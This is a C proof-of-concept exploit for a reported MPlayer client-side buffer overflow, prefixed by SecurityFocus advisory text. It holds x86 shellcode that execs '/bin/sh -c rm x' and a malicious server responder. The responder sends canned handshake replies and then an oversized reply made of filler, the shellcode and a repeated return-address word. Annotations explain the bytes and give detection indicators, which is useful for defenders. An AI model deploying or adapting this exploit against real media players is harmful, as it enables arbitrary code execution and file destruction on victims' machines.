
// source: https://www.securityfocus.com/bid/11962/info
A remote, client-side buffer overflow vulnerability reportedly affects MPlayer. The application fails to validate the length of user-supplied strings before copying them into static process buffers. "Client-side" means the overflow is triggered by data the player receives from a server it has connected to; the program below plays that server role.
An attacker may exploit this issue to execute arbitrary code with the privileges of the user that activated the vulnerable application. This may facilitate unauthorized access or privilege escalation.
/*
 * Bytes that main() writes into its reply stream after the 'A' filler.
 *
 * Layout (137 bytes in total): 78 bytes of 32-bit x86 machine code followed
 * by a 59-byte data area.  The data area is 24 placeholder bytes ('a'..'x')
 * and then the ASCII text "PATH=/bin:/usr/bin /bin/sh -c rm x.".
 *
 * For triage: the only action encoded here is running `/bin/sh -c "rm x"`
 * with PATH set as above, i.e. removing a file named `x` in the working
 * directory of the process that executes it.  The ASCII tail is visible in
 * clear text and is a usable content indicator for this specific sample.
 */
char payload[] = {
    /* Jump forward to the call at the end of the code; that call returns
     * here and the pop recovers the address of the data area. */
    0xeb, 0x47,
    0x59,

    /* Overwrite the 24 placeholder bytes with six 32-bit words: addresses
     * of the strings in the data area (offsets 0x18, 0x2b, 0x33, 0x36) and
     * two zero words. */
    0x89, 0xca,
    0x83, 0xc2, 0x18,
    0x89, 0x11,
    0x31, 0xc0,
    0x89, 0x41, 0x04,
    0x83, 0xc2, 0x13,
    0x89, 0x51, 0x08,
    0x83, 0xc2, 0x08,
    0x89, 0x51, 0x0c,
    0x83, 0xc2, 0x03,
    0x89, 0x51, 0x10,
    0x89, 0x41, 0x14,

    /* Store a zero byte over the separators at data offsets 0x2a, 0x32,
     * 0x35 and 0x3a, which terminates each string. */
    0x88, 0x41, 0x2a,
    0x88, 0x41, 0x32,
    0x88, 0x41, 0x35,
    0x88, 0x41, 0x3a,

    /* Push three pointers and the value 0x3b, then raise int 0x80.
     * NOTE(review): arguments on the stack with 0x3b in eax matches execve
     * on BSD-family x86 -- presumably the intended platform; confirm. */
    0x51,
    0x83, 0xc1, 0x08,
    0x51,
    0x83, 0xc1, 0x20,
    0x83, 0xc1, 0x03,
    0x51,
    0x83, 0xc0, 0x3b,
    0x50,
    0xcd, 0x80,

    /* Second int 0x80 with eax == 1 (presumably exit -- confirm). */
    0x31, 0xc0,
    0x50,
    0x40,
    0x50,
    0xcd, 0x80,

    /* Call back to the pop near the top; the return address it leaves on
     * the stack is the start of the data area below. */
    0xe8, 0xb4, 0xff, 0xff, 0xff,

    /* Data area, part 1: placeholder "abcdefghijklmnopqrstuvwx". */
    0x61, 0x62, 0x63, 0x64, 0x65, 0x66,
    0x67, 0x68, 0x69, 0x6a, 0x6b, 0x6c,
    0x6d, 0x6e, 0x6f, 0x70, 0x71, 0x72,
    0x73, 0x74, 0x75, 0x76, 0x77, 0x78,

    /* Data area, part 2: "PATH=/bin:/usr/bin /bin/sh -c rm x." */
    0x50, 0x41, 0x54, 0x48, 0x3d, 0x2f,
    0x62, 0x69, 0x6e, 0x3a, 0x2f, 0x75,
    0x73, 0x72, 0x2f, 0x62, 0x69, 0x6e,
    0x20, 0x2f, 0x62, 0x69, 0x6e, 0x2f,
    0x73, 0x68, 0x20, 0x2d, 0x63, 0x20,
    0x72, 0x6d, 0x20, 0x78, 0x2e
};
#include <stdio.h>
/*
 * Proof-of-concept responder for the MPlayer client overflow described at
 * the top of this file.
 *
 * Descriptor 0 is read with recv() and every reply goes to stdout; how the
 * program is attached to a network connection is not shown in this listing.
 * The content of the four incoming messages is never inspected -- each
 * recv() only waits for the peer before the next canned reply is written.
 * NOTE(review): which streaming handshake these replies imitate is not
 * stated on the page; confirm against the referenced advisory.
 *
 * What the final reply looks like on the wire (useful for detection):
 *   12 bytes of 0x03, 50000 bytes of 'A' (0x41), the 137-byte payload,
 *   the text "123", then 80000 bytes made of the 4-byte pattern
 *   01 15 bb bf repeated 20000 times.
 * A reply of this size consisting of a single repeated byte followed by a
 * repeated 4-byte word is far outside what a player should accept for a
 * length-bounded string field, which is the missing check named in the
 * advisory text.
 *
 * NOTE(review): the listing is kept as published -- main has no declared
 * return type and recv() is used without its header.
 */
main()
{
    /* Original author's note on this pattern: "RA all the way....".
     * Read as a little-endian 32-bit value it is 0xbfbb1501. */
    static const unsigned char tail_word[4] = { 0x01, 0x15, 0xbb, 0xbf };
    char buf[256];
    int got;
    int round, i, k;

    /* Messages 1 and 2: answer each with the line "hello". */
    for (round = 0; round < 2; round++) {
        got = recv(0, buf, 256, 0);
        printf("hello\n");
        fflush(stdout);
    }

    /* Message 3: answer with eight 0x03 bytes. */
    got = recv(0, buf, 256, 0);
    for (i = 0; i < 8; i++) {
        putchar(0x03);
    }
    fflush(stdout);

    /* Message 4: answer with the oversized reply. */
    got = recv(0, buf, 256, 0);
    for (i = 0; i < 12; i++) {
        putchar(0x03);
    }
    for (i = 0; i < 50000; i++) {
        putchar('A');
    }
    for (i = 0; i < (int)sizeof payload; i++) {
        putchar(payload[i]);
    }

    printf("123");
    for (i = 0; i < 20000; i++) {
        for (k = 0; k < 4; k++) {
            putchar(tail_word[k]);
        }
    }
    fflush(stdout);
}